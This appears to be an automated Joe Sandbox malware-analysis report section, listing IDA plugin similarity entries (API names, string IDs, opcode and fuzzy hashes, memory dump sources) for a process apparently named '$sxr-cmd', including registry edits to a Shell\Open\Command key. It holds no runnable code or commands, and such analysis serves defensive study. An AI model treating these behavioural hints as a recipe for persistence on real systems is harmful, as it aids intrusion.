                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                                                      • API String ID: 4081037667-3301834661
                                                                                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                      • Instruction ID: 80b9c75750cc0d7d5324d9ce7b1ddcc81a87783a003b5e67ac94f957e75fa6cd
                                                                                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                      • Instruction Fuzzy Hash: 1E71C22AB09F4282EB128F25E0902B9EAE1FF85FA4F444131DA4E877A4DF7CDC458740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AA85
                                                                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AACF
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AAEC
                                                                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551AB39
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551AB6F
                                                                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551ABA4
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551ABCB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                                                                      • String ID: %s=%s
                                                                                                                      • API String ID: 1019019434-1087296587
                                                                                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                      • Instruction ID: b50a237686a5e257e223b7847dd616786efc70351634294fec51963fc9bf880a
                                                                                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                      • Instruction Fuzzy Hash: 87517435B08F9286E7618F69E44476ABAE1FB89FA0F454235CA4DC37A5DF7CD8418B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsnicmpwcsrchr
                                                                                                                      • String ID: COPYCMD
                                                                                                                      • API String ID: 2429825313-3727491224
                                                                                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                      • Instruction ID: 1d7a8a5d48d12eb2f1028536a40f26bc6b3d236028815cb9c793f08688334aac
                                                                                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                      • Instruction Fuzzy Hash: 8DF19126F08A52C6FB608F69D0805BDB6B1AB45FB8F005236DA5DA36B4DF3CAD51C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$FullNamePathwcsrchr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4289998964-0
                                                                                                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                      • Instruction ID: 75c4455bc5a00d99cf9cf72dfa8944653612600820152b0d3436b5b5ccde7fb4
                                                                                                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                      • Instruction Fuzzy Hash: 01C19269A0DB5682EE949F569588379A7A0FB45FE0F005535CE0E877E1EF3CACA18340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3140674995-0
                                                                                                                      • Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction ID: bbdaa6c9df3794b4ae779cee903fa7f2fb7f240c04fe9aa6be6cf396b127dd2c
                                                                                                                      • Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
                                                                                                                      • Instruction Fuzzy Hash: 6631617221AB8086FB60CFA0E8847ED7375F794754F844429DA4D4BB9AEF39C548C714
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3476366620-0
                                                                                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                      • Instruction ID: 1c56dd3d02a7e39854837f82afe3d354a370cb32efffae762cc19e0801d91046
                                                                                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                      • Instruction Fuzzy Hash: F521EC28908E4296EA586F20A8553B8EB60FF4AF75F855275C55EC22F2DF3CAC45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: a88e087294aeb99ecbd7e36c5126131fe0c3135d05d534e30f8c4bd677ee2013
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: 59319632219F8096EB60CF65E84479E73B5F788764F940125EE8D4BB96EF39C545CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                      • String ID: %9d
                                                                                                                      • API String ID: 1006866328-2241623522
                                                                                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                      • Instruction ID: 7980fdebf800fbe16dffa7eb00f8f20967062d4eb9145e62308f228f7e8864b0
                                                                                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                      • Instruction Fuzzy Hash: 0E517976A08A428AE300CF25E8405A9BBA4FB44F78F444635DA2D93BB5DF3CE914CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: 7b34629eb24a875622a36634e6b9333de77955a69301957a7d0240ed6b362b56
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: C5E11572719B809AE701CFA4D4883DD7BB2F344BA8F944116DE4E5BB9AEA35C51AC700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2221118986-0
                                                                                                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                      • Instruction ID: 7bffe5af1a84e786f1108c64fb7bb27d960f44432a39d90c9a1575fe1cd63a69
                                                                                                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                      • Instruction Fuzzy Hash: D2C1D636A09F8286EB60DF29E450AB9B3A0FB55F68F044136DA0D8B7B5DF3CD9508300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1357844191-0
                                                                                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                      • Instruction ID: 0c2837be62fbc070f6b0653932172b8a58d2cb048099a77720d1472a633154eb
                                                                                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                      • Instruction Fuzzy Hash: 1DA19F29A18E4281EA54DF2DA851679B7A0FF84FA4F505136DE4EC7BB1DF3CE8118700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DiskFreeSpace
                                                                                                                      • String ID: %5lu
                                                                                                                      • API String ID: 2448137811-2100233843
                                                                                                                      • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                      • Instruction ID: 5680c459ea797f3f33b76f22cbe5048e646371426b39ff749897e6933435a585
                                                                                                                      • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                      • Instruction Fuzzy Hash: C9417036708AC185EB61DF25E8406EAB761FB84F98F408036DA4D8BB69DF7CD949C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmp
                                                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                                                      • API String ID: 2081463915-1994581435
                                                                                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                      • Instruction ID: fc53c2c0b8737e5842c240469c083d979781ba09aedddded036022e021dcb855
                                                                                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                      • Instruction Fuzzy Hash: DC71AC25E0CE4689FBA49B2CA844279A6E0AF10F75F541536D55EC26F0EF3CACA18340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907026637.0000020D0B5F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000020D0B5F0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b5f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                      • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                                                                                      • API String ID: 3215553584-1407779936
                                                                                                                      • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction ID: 69a7d70aed1b46f29ac0989fb6d5f6538e2a4057d0eee9d26adf792271ed4311
                                                                                                                      • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                                                                                      • Instruction Fuzzy Hash: 2A51AF62716B5685EF14DBE6DC0C69DABB2FB58BE8F444565DE0D07F86EA38C0428300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenToken$CloseProcessThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2991381754-0
                                                                                                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                      • Instruction ID: 7af948592c201788736f4cff93510ba9eb80024ffeb20840e7f25cc3d8e380cd
                                                                                                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                      • Instruction Fuzzy Hash: 9F216D36A08A428BEB009B94D4406B9E7A0EB85FB4F544536DB59C26A4DF78EC48CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationQueryToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4239771691-0
                                                                                                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                      • Instruction ID: 804a12f3ae5817cc096aec328e2c9216a47418375b066d36cc39aa8410f0c169
                                                                                                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                      • Instruction Fuzzy Hash: 7F110D77618B91C7E7108B01E4407A9BBA4FB85FA9F404131DA4886A64DF7DD988CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileInformation$HandleQueryVolume
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2149833895-0
                                                                                                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                      • Instruction ID: 2f6cd6e8a6c4ab9ebe53124d91a4f09fa97fb1291814772d1469087c5224096a
                                                                                                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                      • Instruction Fuzzy Hash: 98117335608BC186E7608B61F4407AEF7A0FB44F98F445131DA9DC2A65DFBCD948CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
